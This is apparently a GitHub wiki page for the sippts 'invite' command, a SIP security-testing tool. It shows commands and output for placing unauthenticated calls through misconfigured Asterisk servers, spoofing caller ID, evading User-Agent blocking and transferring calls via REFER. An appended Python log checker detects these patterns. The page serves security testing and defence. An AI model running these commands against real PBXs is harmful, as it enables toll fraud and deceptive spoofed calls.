Command invite - Pepelux/sippts GitHub Wiki

SIPPTS invite checks whether a PBX server allows us to make calls without authentication. If the SIP server is misconfigured, it will allow us to make calls to external numbers. It can also allow us to transfer the call to a second external number.

For example, if your Asterisk server has a bad context configuration, it may accept INVITE requests without authorization. In this case, an attacker can make calls without knowing any user/pass.

Features

Invite allows us to:

  • Connect via UDP, TCP or TLS.
  • Test remotely whether a SIP server requires authentication to make calls.
  • Make calls without auth if the server is misconfigured.
  • Transfer established calls to a second external number (1).
  • Alter the caller ID if the server allows it.
  • Analyze responses using verbose mode.
  • Customize the User-Agent.
  • Use a valid user/pass to make calls with authentication.

(1) If you can send an INVITE through a misconfigured server and the call rings on the target number, it is possible to send a second message (a REFER in this case) to transfer the call to another number:

   SIPPTS                     SIP Server                      Phone1              Phone2
         ---> INVITE      ---> 
                                        ---> INVITE      --->
                                        <--- 100 Trying  <---
         <--- 100 Trying  <---
                                        <--- 180 Ringing <---
         <--- 180 Ringing <---
                                        <--- 200 Ok      <---
         <--- 200 Ok      <---
         ---> ACK         ---> 
         <--- 200 Ok      <---
         ---> REFER       ---> 
                                        --->           INVITE                --->
         <--- 202 Accept  <---
                                                              <--->  RTP Session <--->

Usage

$ sippts invite -h

Target:
  -i IP|HOST          Target IP address
  -r REMOTE_PORT      Remote port (default: 5060)
  -p PROTOCOL         Protocol: udp|tcp|tls (default: udp)
  -l LOCAL_PORT       Local port (default: first free)
  -proxy IP:PORT      Use an outbound proxy (ex: 192.168.1.1 or 192.168.1.1:5070)

Headers:
  -d DOMAIN           SIP Domain or IP address. Ex: my.sipserver.com (default: target IP address)
  -cd CONTACT_DOMAIN  Domain or IP address for Contact header. Ex: 10.0.1.2
  -fn FROM_NAME       From Name. Ex: Bob
  -fu FROM_USER       From User (default: 100)
  -fd FROM_DOMAIN     From Domain. Ex: 10.0.0.1
  -ft FROM_TAG        From Tag
  -tn TO_NAME         To Name. Ex: Alice
  -tu TO_USER         To User (default: 100)
  -td TO_DOMAIN       To Domain. Ex: 10.0.0.1
  -ua USER_AGENT      User-Agent header (default: pplsip)
  -ppi PPI            P-Preferred-Identity
  -pai PAI            P-Asserted-Identity
  -no-sdp             Do not send SDP (by default is included)
  -sdes               Send SDES in SDP

Auth:
  -user AUTH_USER     Authentication user
  -pass AUTH_PASS     Authentication password

Log:
  -v                  Increase verbosity
  -nocolor            Show result without colors
  -o FILE             Save data into a log file

Other options:
  -t NUMBER           Phone number to transfer the call
  -th THREADS         Number of threads (default: 200)
  -local-ip IP        Set local IP address (by default try to get it)
  -h, --help          Show this help

  • Trying to make a call to the exten 100 (without auth).
$ sippts invite -i 192.168.0.1 -tu 100
  • Trying to make a call to the exten 100 (with auth).
$ sippts invite -i 192.168.0.1 -user sipuser -pass supersecret -tu 100
  • Trying to make a call to the number 555555555 (without auth) with source number 200.
$ sippts invite -i 192.168.0.1 -fu 200 -tu 555555555 -v
  • Trying to make a call to the number 555555555 (without auth) and transfer it to number 444444444.
$ sippts invite -i 192.168.0.1 -tu 555555555 -t 444444444
  • Trying to make a call to the number 555555555 (without auth) using callerid 123456789 and transfer it to number 444444444.
$ sippts invite -i 192.168.0.1 -tu 555555555 -t 444444444 -fu 123456789
  • Maybe 'pplsip' is a known UserAgent and the system automatically blocks the SIP messages. You can change it with the -ua parameter.
$ sippts invite -i 192.168.0.1 -tu 555555555 -ua myUserAgent
  • The call from the Devil };->
$ sippts invite -i 192.168.0.1 -tu 555555555 -fu 666666666 -fn Devil

Examples

  • Asterisk server with a well-configured context, even though it accepts INVITE requests without user authentication (the call is rejected):
$ sippts invite -i 192.168.0.55 -tu 0034666666666
[+] Sending INVITE 100 => 0034666666666
[-] 404 Not Found

On the Asterisk console you can see something similar to this:

NOTICE[1034]: chan_sip.c:22753 handle_request_invite: Call from '' (X.X.X.X:5070) to extension '0034666666666' rejected because extension not found in context 'default'.

  • Asterisk server with a misconfigured context that also allows us to make calls without user authentication:
$ sippts invite -i 192.168.0.55 -tu 0034666666666
[+] Sending INVITE 100 => 0034666666666
[-] 100 Trying
[-] 183 Session Progress
[-] 200 OK

On the Asterisk console you can see something similar to this:

  == Using SIP RTP CoS mark 5
    -- Executing [0034666666666@default:1] Dial("SIP/192.160.0.55-00000001", "SIP/trunk/0034666666666,30") in new stack
  == Using SIP RTP CoS mark 5
    -- Called SIP/trunk/0034666666666

Trying a transfer in the same vulnerable server:

$ sippts invite -i 192.168.0.55 -tu 0034666666666 -t 0034777777777
[+] Sending INVITE 100 => 0034666666666
[-] 100 Trying
[-] 183 Session Progress
[-] 200 OK
[+] Sending ACK
[+] Sending REFER 100 => 0034777777777
[-] 202 Accepted

On the Asterisk console you can see something similar to this:

  == Using SIP RTP CoS mark 5
    -- Executing [0034666666666@default:1] Dial("SIP/192.168.0.55-00000000", "SIP/trunk/0034666666666,30") in new stack
  == Using SIP RTP CoS mark 5
    -- Called SIP/trunk/0034666666666
    -- SIP/trunk-00000001 is making progress passing it to SIP/192.168.0.55-00000000
    -- SIP/trunk-00000001 answered SIP/192.168.0.55-00000000
    -- Remotely bridging SIP/192.168.0.55-00000000 and SIP/trunk-00000001
    -- Executing [0034777777777@default:1] Dial("SIP/trunk-00000001", "SIP/trunk/0034777777777,30") in new stack
  == Using SIP RTP CoS mark 5
    -- Called SIP/trunk/0034777777777
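
A log check built on the console output above, added here as an example and not part of sippts or the original wiki: it scans Asterisk log text for the three patterns this page shows (an INVITE stopped only by the dialplan, an outbound Dial from the `default` context, and the re-dial that follows a REFER). The context name `default` and trunk name `trunk` are taken from the page's output; treating a caller channel named after an IP address as an unauthenticated caller is a heuristic assumption, and the sample lines are constructed.

```python
import re

# Constructed sample, modelled on the Asterisk console output shown above.
SAMPLE_LOG = """\
NOTICE[1034]: chan_sip.c:22753 handle_request_invite: Call from '' (192.0.2.10:5070) to extension '0034666666666' rejected because extension not found in context 'default'.
    -- Executing [0034666666666@default:1] Dial("SIP/192.168.0.55-00000000", "SIP/trunk/0034666666666,30") in new stack
    -- Called SIP/trunk/0034666666666
    -- Executing [0034777777777@default:1] Dial("SIP/trunk-00000001", "SIP/trunk/0034777777777,30") in new stack
    -- Executing [100@internal:1] Dial("SIP/alice-00000002", "SIP/100,30") in new stack
"""

REJECTED = re.compile(
    r"Call from '[^']*' \((?P<src>[^)]+)\) to extension '(?P<exten>[^']+)' "
    r"rejected because extension not found in context '(?P<ctx>[^']+)'")
DIAL = re.compile(
    r'Executing \[(?P<exten>[^@\]]+)@(?P<ctx>[^:\]]+):\d+\] '
    r'Dial\("SIP/(?P<chan>[^"]+)-[0-9a-fA-F]{8}", "(?P<dest>[^",]+)')
IP_NAMED = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def analyze(log_text, guest_context="default", trunk="trunk"):
    """Return (finding, dialled number, source) tuples for suspicious lines."""
    findings = []
    for line in log_text.splitlines():
        m = REJECTED.search(line)
        if m:
            # The INVITE reached the dialplan; only the missing extension stopped it.
            if m["ctx"] == guest_context:
                findings.append(("unauth_invite_rejected", m["exten"], m["src"]))
            continue
        m = DIAL.search(line)
        if not m or m["ctx"] != guest_context:
            continue
        if not m["dest"].startswith(f"SIP/{trunk}/"):
            continue  # not an outbound call through the trunk
        if IP_NAMED.fullmatch(m["chan"]):
            # Caller channel named after an IP address, not a configured peer.
            findings.append(("unauth_outbound_call", m["exten"], m["chan"]))
        elif m["chan"] == trunk:
            # The answered trunk leg is re-dialled from the guest context (REFER).
            findings.append(("transfer_via_guest_context", m["exten"], m["chan"]))
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_LOG):
        print(finding)
```

Any `unauth_outbound_call` or `transfer_via_guest_context` finding means the guest context can reach the trunk, which is the misconfiguration this command tests for.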